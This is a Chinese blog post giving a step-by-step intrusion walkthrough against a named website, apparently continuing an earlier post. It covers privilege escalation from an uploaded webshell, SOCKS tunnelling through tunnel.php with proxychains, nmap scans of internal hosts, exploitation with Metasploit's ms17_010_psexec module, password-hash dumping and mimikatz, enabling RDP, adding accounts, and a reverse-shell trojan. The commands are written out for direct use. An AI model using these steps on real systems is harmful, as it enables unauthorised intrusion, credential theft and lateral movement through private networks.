zoukankan      html  css  js  c++  java
  • 【提权过程】嘉缘网站--提权,代理,内网渗透(针对445端口)

    这篇是由上篇 【渗透过程】嘉缘网站--测试
    https://www.cnblogs.com/G-Shadow/articles/10964374.html
    之后的操作,文章包括了提权,HTTP代理及对内网的渗透

    使用蚁剑连接上写入的一句话后,使用虚拟终端发现自己权限为最高权限可以执行任何操作

    这里讲一下提权,假如权限不高,需要进行提权

    首先:查看服务器的操作系统

    如果这里为win2003,可以找台2003的机器把cmd.exe程序上传到目标服务器

    跳到该目录下执行cmd 你会发现权限权限有所提升,可以执行一下基础命令,但是还是无法执行新建用户,开启3389端口等命令

    这时我们只需上传提权工具如pr 巴西烤肉等

    使用提取权工具进行命令的执行,这样我们就达到提权的目的了

     接着上篇,当我们使用蚁剑进行执行Dos命令发现目标服务器存在2块网卡

    (这里蚁剑如果无法执行命令,可以上传一个大马)

     

    而且发现在238段下还有内网服务器

    arp -a

    需要进行挂代理,只有这样才能对内网服务器进行测试

    代理设置:

    (因为要对内网进行其他操作,所有这里只介绍如何给kali进行代理设置)

    首先安装:

     

    安装插件

    安装完成后

    这里需要通过菜刀或蚁剑上传所需的文件(网站为php站这里上传tunnel.php)

    上传成功后进行监听 ,监听的终端不能关需要一直开启

    再次开启一个终端  修改配置文件

    把dynamic_chain前的#删掉

    同时在最下方加入  socks5 127.0.0.1 9632(这里的9632为你上方监听的端口)之后退出保存

    通过打开的网页访问内网IP 192.168.238.128  这时进行监听的终端开始跑了并成功显示探针 说明代理设置成功

    如果监听的终端没有变化,网页也没显示,需要进行以下操作,之后再次从终端打开浏览器

     

    如果还不成功,请关机,从新启动一下kali (修改的配置没有运行成功,需要重启)

    添加路由 route add -net 192.168.90.0 netmask 255.255.255.0 dev eth0
    		 route add -net 192.168.80.0 netmask 255.255.255.0 dev eth0
    		 route add -net 192.168.90.0/24 gw 192.168.90.1
    		 
    删除路由 route del -net 192.168.80.0 netmask 255.255.255.0 dev eth0
    

      

    内网渗透

    针对445端口

    代理成功后,每此执行命令或使用软件时 在命令前加上 proxychains

    之后使用nmap开始对 192.168.238.129   129.168.238.130 进行端口扫描

    proxychains nmap -vvv -n -sT -PN 192.168.238.129
    proxychains nmap -vvv -n -sT -PN 192.168.238.130
    

    发现2个都开135 139 445端口  这里只对445进行   

    192.168.238.129

     

    192.168.238.130

    对192.168.238.129:445

     使用kali的工具   

    proxychains msfconsole   //启动MSF终端

    使用攻击模块

    search   option  //搜索相关工具和攻击载荷
    use  use exploit/windows/smb/ms17_010_psexec  //启动该模块
    show options    //查看相关信息

    set RHOST  目标IP
    set LHOST 本机IP
    set threads 端口
    exploit //执行 或者用run

    执行成功后会返回meterpreter  当执行命令有可能不会回显,因为有代理有可能返回的包会丢失 但是命令会执行

    我们尝试直接利用 getuid 和 getsystem 命令来提权

    使用命令获取hash值

    run post/windows/gather/smart_hashdump

    通过撞库得到administrator的密码  

    使用得到密码和账户使用kaili的远程桌面进行连接

    proxychains  rdesktop IP  //远程连接 目标机需要开启3389端口

    run post/windows/manage/enable_rdp    //开启3389

    run getgui -u xxxxx -p xxxxx //添加用户

    download c:\1.txt //下载文件

    upload ll.txt c: //上传文件

    cat 11.txt //查看文件

    pwd //查询当前路径

    sysinfo //显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息

       介绍个神器 mimikatz :

       load mimikatz

       msv (获取 hash 值)

       ssp (获取明文信息)

       wdigest (获取系统账户信息)

       mimikatz_command -f a:: (必须要以错误的模块来让正确的模块显示)

       mimikatz_command -f hash:: (获取目标 hash)

     

    如果直接使用开启3389端口命令无法执行的话,可以在本地生产一个木马文件通过上传一个木马文件

    创建会话反弹会一个shell

    从新开启一个终端

     同时使用另一个终端上传生成的exe程序 并执行

  • 相关阅读:
    用vbox搭建Linux服务器
    mysql数据库两表关联查询统计同一字段不同值的个数
    2019-06-16 Java学习日记之XML&tomcat
    2019-06-15 Java学习日记之mysql多表查询
    2019-06-14 Java学习日记之SQL
    2019-06-13 Java学习日记之MySql
    XML & Tomcat
    数据库的CRUD操作
    PrepareStatement
    Dao模式(data Access Object 数据访问对象)
  • 原文地址:https://www.cnblogs.com/G-Shadow/p/10965035.html
Copyright © 2011-2022 走看看